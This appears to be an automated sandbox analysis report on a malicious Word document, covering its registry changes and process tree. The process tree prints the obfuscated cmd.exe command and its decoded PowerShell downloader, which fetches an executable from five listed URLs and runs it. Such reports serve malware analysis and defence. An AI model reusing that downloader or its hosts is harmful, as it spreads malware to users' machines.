Analysis
-
max time kernel
118s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
20-05-2024 05:08
Behavioral task
behavioral1
Sample
5d556be2d8f7b1ee8cf75c1fdbc3258e_JaffaCakes118.doc
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
5d556be2d8f7b1ee8cf75c1fdbc3258e_JaffaCakes118.doc
Resource
win10v2004-20240426-en
General
-
Target
5d556be2d8f7b1ee8cf75c1fdbc3258e_JaffaCakes118.doc
-
Size
88KB
-
MD5
5d556be2d8f7b1ee8cf75c1fdbc3258e
-
SHA1
64a38f77f27e6c43f2c442b292c601713d649252
-
SHA256
f56253a906074b2f40c32b182590049f4aa89644d9904f74021dc6a2333e17be
-
SHA512
aae1f5e0374dc67428dca48a54019a70cb65e843406eaf96530e327de0cf798cf4e7afe4fb5d61672091737c73288e1fee2cf3dd09d5d875e0b526fbf14a5329
-
SSDEEP
768:SJOVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBZ+1oQAb8gLyVvHKyoZXrQ/iJw7o:gOocn1kp59gxBK85fBZ+aQuFDyg0i64/
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2640 948 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 10 IoCs
Processes:
powershell.exeflow pid process 7 2476 powershell.exe 8 2476 powershell.exe 10 2476 powershell.exe 12 2476 powershell.exe 15 2476 powershell.exe 17 2476 powershell.exe 19 2476 powershell.exe 20 2476 powershell.exe 22 2476 powershell.exe 24 2476 powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE -
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 948 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 2476 powershell.exe 2456 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2476 powershell.exe Token: SeDebugPrivilege 2456 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 948 WINWORD.EXE 948 WINWORD.EXE -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
WINWORD.EXEcmd.execmd.execmd.exepowershell.exedescription pid process target process PID 948 wrote to memory of 2208 948 WINWORD.EXE splwow64.exe PID 948 wrote to memory of 2208 948 WINWORD.EXE splwow64.exe PID 948 wrote to memory of 2208 948 WINWORD.EXE splwow64.exe PID 948 wrote to memory of 2208 948 WINWORD.EXE splwow64.exe PID 948 wrote to memory of 2640 948 WINWORD.EXE cmd.exe PID 948 wrote to memory of 2640 948 WINWORD.EXE cmd.exe PID 948 wrote to memory of 2640 948 WINWORD.EXE cmd.exe PID 948 wrote to memory of 2640 948 WINWORD.EXE cmd.exe PID 2640 wrote to memory of 2556 2640 cmd.exe cmd.exe PID 2640 wrote to memory of 2556 2640 cmd.exe cmd.exe PID 2640 wrote to memory of 2556 2640 cmd.exe cmd.exe PID 2640 wrote to memory of 2556 2640 cmd.exe cmd.exe PID 2556 wrote to memory of 2044 2556 cmd.exe cmd.exe PID 2556 wrote to memory of 2044 2556 cmd.exe cmd.exe PID 2556 wrote to memory of 2044 2556 cmd.exe cmd.exe PID 2556 wrote to memory of 2044 2556 cmd.exe cmd.exe PID 2556 wrote to memory of 2860 2556 cmd.exe cmd.exe PID 2556 wrote to memory of 2860 2556 cmd.exe cmd.exe PID 2556 wrote to memory of 2860 2556 cmd.exe cmd.exe PID 2556 wrote to memory of 2860 2556 cmd.exe cmd.exe PID 2860 wrote to memory of 2868 2860 cmd.exe cmd.exe PID 2860 wrote to memory of 2868 2860 cmd.exe cmd.exe PID 2860 wrote to memory of 2868 2860 cmd.exe cmd.exe PID 2860 wrote to memory of 2868 2860 cmd.exe cmd.exe PID 2860 wrote to memory of 2476 2860 cmd.exe powershell.exe PID 2860 wrote to memory of 2476 2860 cmd.exe powershell.exe PID 2860 wrote to memory of 2476 2860 cmd.exe powershell.exe PID 2860 wrote to memory of 2476 2860 cmd.exe powershell.exe PID 2476 wrote to memory of 2456 2476 powershell.exe powershell.exe PID 2476 wrote to memory of 2456 2476 powershell.exe powershell.exe PID 2476 wrote to memory of 2456 2476 powershell.exe powershell.exe PID 2476 wrote to memory of 2456 2476 powershell.exe powershell.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d556be2d8f7b1ee8cf75c1fdbc3258e_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2208
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\cmd.exe /V:O/C"set ZW= }}{hctac}}kaerb;ZUX$ ssecorP-tratS;)ZUX$(elifotevas.RTX$;)ydoBesnopser.DRc$(etirw.RTX$;1 = epyt.RTX$;)(nepo.RTX${ )'*ZM*' ekil- txetesnopser.DRc$( fI;)(dnes.DRc$;)0,GjU$,'TEG'(nepo.DRc${yrt{)DIk$ ni GjU$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = RTX$;'ptthlmx.2lmxsm' moc- tcejbO-weN= DRc$;)'exe.vZj\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=ZUX$;)'@'(tilpS.'r2XLabAu/ten.kcolnuym//:ptth@gLpdpvh/moc.citamarolf.www//:ptth@gBtLjq99/ri.eltsac-srats//:ptth@4asvsvLN/ta.kcoronarev.www//:ptth@bno8STBJ9/moc.niurtsnocsm//:ptth'=DIk$;'GJS'=vHS$ llehsrewop&&for /L %d in (556,-1,0)do set Vyl=!Vyl!!ZW:~%d,1!&&if %d equ 0 echo !Vyl:*Vyl!=! |FOR /F "tokens=2 delims=.uByX" %I IN ('assoc.ps1xml')DO %I -"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /V:O/C"set ZW= }}{hctac}}kaerb;ZUX$ ssecorP-tratS;)ZUX$(elifotevas.RTX$;)ydoBesnopser.DRc$(etirw.RTX$;1 = epyt.RTX$;)(nepo.RTX${ )'*ZM*' ekil- txetesnopser.DRc$( fI;)(dnes.DRc$;)0,GjU$,'TEG'(nepo.DRc${yrt{)DIk$ ni GjU$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = RTX$;'ptthlmx.2lmxsm' moc- tcejbO-weN= DRc$;)'exe.vZj\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=ZUX$;)'@'(tilpS.'r2XLabAu/ten.kcolnuym//:ptth@gLpdpvh/moc.citamarolf.www//:ptth@gBtLjq99/ri.eltsac-srats//:ptth@4asvsvLN/ta.kcoronarev.www//:ptth@bno8STBJ9/moc.niurtsnocsm//:ptth'=DIk$;'GJS'=vHS$ llehsrewop&&for /L %d in (556,-1,0)do set Vyl=!Vyl!!ZW:~%d,1!&&if %d equ 0 echo !Vyl:*Vyl!=! |FOR /F "tokens=2 delims=.uByX" %I IN ('assoc.ps1xml')DO %I -"3⤵
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo powershell $SHv='SJG';$kID='http://msconstruin.com/9JBTS8onb@http://www.veranorock.at/NLvsvsa4@http://stars-castle.ir/99qjLtBg@http://www.floramatic.com/hvpdpLg@http://myunlock.net/uAbaLX2r'.Split('@');$XUZ=([System.IO.Path]::GetTempPath()+'\jZv.exe');$cRD =New-Object -com 'msxml2.xmlhttp';$XTR = New-Object -com 'adodb.stream';foreach($UjG in $kID){try{$cRD.open('GET',$UjG,0);$cRD.send();If ($cRD.responsetext -like '*MZ*') {$XTR.open();$XTR.type = 1;$XTR.write($cRD.responseBody);$XTR.savetofile($XUZ);Start-Process $XUZ;break}}catch{}} "4⤵PID:2044
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=2 delims=.uByX" %I IN ('assoc.ps1xml') DO %I -"4⤵
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c assoc.ps1xml5⤵PID:2868
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowerShell -5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =SJG6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2456
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
20KB
MD591a0c5ab8dca8639dc02e95ecaa46c8e
SHA1d1ca4f28a6ac0fba57ec08a907f68f8587ad0613
SHA256277b6c52f4aab94273e9f5dceb0660922efd3575e42ded1e7669c0549f296e41
SHA51259d8009431322e13af66672e703e3ffe87cdbcb5ca018a5a6fa48eeee976d6f70087ed0d967f5b92c9d7e60e520c2513d494f8ff2bbb42a544509b6eaee62f0b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD563e044dcfcdeae1d6f33c11e540ac4e2
SHA1ee9b63b377eb2f4763e0e1ddcb1f17bd67b160de
SHA256118a1c985664e8dab9f9748b51977da2c411d165fbfccd5683d21e3856ec3325
SHA512db93194196a9359560cc1ed9614642f17e06cb18697cf24a072dfaf5939a07f2857ae9d6baa1df20124bab9493f5f569f8b3487456c9205e6222629fa51bae7f